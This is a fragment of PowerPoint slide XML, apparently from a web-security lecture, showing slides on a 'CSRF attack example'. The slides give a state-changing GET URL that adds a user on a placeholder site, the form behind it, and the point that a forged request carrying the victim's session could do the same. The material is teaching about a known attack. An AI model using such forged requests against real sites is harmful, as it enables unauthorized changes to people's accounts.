                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Changes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and email, addition of an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>unauthorized</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-26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user</a:t>
            </a:r>
            <a:endParaRPr sz="20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16861" y="645668"/>
            <a:ext cx="585025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 CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>(Step </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>1 of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="110" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>3)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209547" y="6354571"/>
            <a:ext cx="68230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0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.xyz.com/users.php?x=0&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>=add&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>=joe&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>…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5105400" y="1319783"/>
            <a:ext cx="4495799" cy="50170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12901" y="1290625"/>
            <a:ext cx="4043045" cy="4024629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1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;form </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>method=“get"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>action="users.php"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="676910" indent="-173355">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;input type="hidden" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>"  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>value=“add"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="113664">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;input type="hidden" name="x" value="0"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-120" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="113664">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;table</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="384"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;tr&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="317500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;td&gt;Login</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>name:&lt;/td&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="317500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;td&gt;&lt;input type="text"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>name="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>/&gt;&lt;/td&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/tr&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="384"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/table&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="165100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;input type="submit" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>value=“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-90" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia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1600" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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757803" y="3673602"/>
            <a:ext cx="0" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="379095">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="378713"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28194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758184" y="4080509"/>
            <a:ext cx="4166870" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4166870">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4166616" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28956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860030" y="3249929"/>
            <a:ext cx="132715" cy="830580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132715" h="830579">
                <a:moveTo>
                  <a:pt x="132587" y="114299"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128777" y="107441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67055" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3809" y="106679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="113537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2285" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16001" y="130301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25145" y="128015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="121157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52477" y="81243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52577" y="28193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80771" y="28193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80771" y="81072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104393" y="121157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108203" y="128015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116585" y="130301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130301" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132587" y="114299"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="830579">
                <a:moveTo>
                  <a:pt x="80671" y="80902"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="66674" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52477" y="81243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51053" y="830579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79247" y="830579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80671" y="80902"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="830579">
                <a:moveTo>
                  <a:pt x="80771" y="28193"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="52577" y="28193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52477" y="81243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54101" y="78485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54101" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79247" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79247" y="78485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80671" y="80902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80771" y="28193"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="830579">
                <a:moveTo>
                  <a:pt x="79247" y="35813"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="54101" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66674" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79247" y="35813"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="830579">
                <a:moveTo>
                  <a:pt x="66674" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="54101" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54101" y="78485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66674" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="830579">
                <a:moveTo>
                  <a:pt x="79247" y="78485"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="79247" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66674" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79247" y="78485"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="830579">
                <a:moveTo>
                  <a:pt x="80771" y="81072"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="80771" y="28193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80671" y="80902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80771" y="81072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201917" y="6107429"/>
            <a:ext cx="809625" cy="132715"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="809625" h="132714">
                <a:moveTo>
                  <a:pt x="751903" y="66674"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="727591" y="52475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="51053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="79247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727942" y="80669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751903" y="66674"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="809625" h="132714">
                <a:moveTo>
                  <a:pt x="780288" y="83690"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="780288" y="80771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727942" y="80669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687324" y="104393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680466" y="108203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678180" y="116585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681990" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686562" y="130301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694944" y="132587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="701802" y="128777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780288" y="83690"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="809625" h="132714">
                <a:moveTo>
                  <a:pt x="809244" y="67055"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="701802" y="3809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="695706" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686562" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678942" y="16001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681228" y="25145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687324" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727591" y="52475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780288" y="52577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780288" y="83690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809244" y="67055"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="809625" h="132714">
                <a:moveTo>
                  <a:pt x="780288" y="80771"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="780288" y="52577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727591" y="52475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751903" y="66674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="773430" y="54101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="773430" y="80758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780288" y="80771"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="809625" h="132714">
                <a:moveTo>
                  <a:pt x="773430" y="80758"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="773430" y="79247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751903" y="66674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727942" y="80669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="773430" y="80758"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="809625" h="132714">
                <a:moveTo>
                  <a:pt x="773430" y="79247"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="773430" y="54101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="751903" y="66674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="773430" y="79247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34</a:t>
            </a:fld>
            <a:endParaRPr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16861" y="645668"/>
            <a:ext cx="677418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 CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>(Step </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>1 of 3)</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="130" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130046" y="1616963"/>
            <a:ext cx="6677406" cy="235305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93902" y="4342129"/>
            <a:ext cx="7346950" cy="1781175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287020" marR="257175" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="66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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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added</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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typing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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the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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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into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browser  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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bar</a:t>
            </a:r>
            <a:endParaRPr sz="24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25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2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>information </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>appended</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-37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automatically</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="25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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-65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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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could</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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add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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15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as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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well!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35</a:t>
            </a:fld>
            <a:endParaRPr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16861" y="645668"/>
            <a:ext cx="585025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 CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
